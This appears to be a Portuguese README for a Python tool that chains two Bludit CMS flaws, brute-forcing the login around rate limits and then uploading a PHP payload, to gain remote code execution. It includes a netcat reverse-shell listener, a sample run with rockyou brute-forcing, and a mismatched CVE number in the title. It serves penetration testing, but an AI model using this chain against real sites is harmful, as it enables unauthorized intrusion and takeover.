
cve-2016-16113
_ _____ ___ _
__| |___ /_ ___ __ / _ \ _ __ ___ (_)
/ _` | |_ \ \ / / '_ \| | | | '_ ` _ \| |
| (_| |___) \ V /| | | | |_| | | | | | | |
\__,_|____/ \_/ |_| |_|\___/|_| |_| |_|_|
Uma ferramenta automatizada de exploração que combina CVE-2019-17240 (Bypass de Autenticação) e CVE-2019-16113 (Upload Arbitrário de Arquivos) para obter execução remota de código em instalações vulneráveis do Bludit CMS.
SOMENTE PARA TESTES DE SEGURANÇA AUTORIZADOS
Esta ferramenta é destinada a profissionais de segurança que realizam testes de penetração autorizados e pesquisadores de segurança que atuam dentro dos limites legais. O acesso não autorizado a sistemas de computadores é ilegal sob leis como o Computer Fraud and Abuse Act (CFAA) nos Estados Unidos e legislação semelhante em todo o mundo.
Ao usar esta ferramenta, você concorda em:
O autor não assume nenhuma responsabilidade e não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.
Este exploit automatiza o processo de:
Versões Afetadas: Bludit CMS versões 3.9.2 e anteriores
requests# Clone the repository
git clone https://github.com/yourusername/get-rce.git
cd get-rce
# Install dependencies
pip install -r requirements.txt
requirements.txt:
requests>=2.25.0
python3 get_rce.py
O script solicitará:
https://target.com)Antes de executar o exploit, configure um listener netcat:
nc -lvnp 4444
Substitua 4444 pela porta escolhida.
$ python3 get_rce.py
Enter target URL (i.e. https://target.com): http://10.10.10.191
[ ~ ] Enter listener's IP: 10.10.14.5
[ ~ ] Enter listener's port: 4444
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...
[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username):
[...] We are gonna default to 'admin' as username.
[ ~ ] Enter the location for password list: /usr/share/wordlists/rockyou.txt
[ * ] Tried: 123456
[ * ] Tried: password
[ * ] Tried: 12345678
...
[ + ] Creds found: admin:Password123
[ + ] Login succeed... We are good to go :)
[ + ] The payload XyZaBcDeFg.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
Should I bruteforce username? [Y/N]: N
What username should I use?: admin
Enter the location for password list: /path/to/passwords.txt
Should I bruteforce username? [Y/N]: Y
Enter the location for username wordlist: /path/to/usernames.txt
Enter the location for password wordlist: /path/to/passwords.txt
SecLists: https://github.com/danielmiessler/SecLists
SecLists/Usernames/Names/names.txtSecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txtRockYou: /usr/share/wordlists/rockyou.txt (Kali Linux)
X-Forwarded-For para contornar o limite de taxa/bl-content/tmp/.htaccess para garantir a execuçãoSe você é um administrador de sistema:
/bl-content/tmp/ em busca de arquivos suspeitosProblema: "O alvo parece estar fora do ar"
Problema: "Falha no login"
Problema: "Nenhum shell recebido"
d3vn0mi
Este projeto é fornecido apenas para fins educacionais e de testes de segurança autorizados. Consulte o aviso legal no início deste README.
Contribuições, problemas e solicitações de recursos são bem-vindos! Sinta-se à vontade para verificar a página de issues.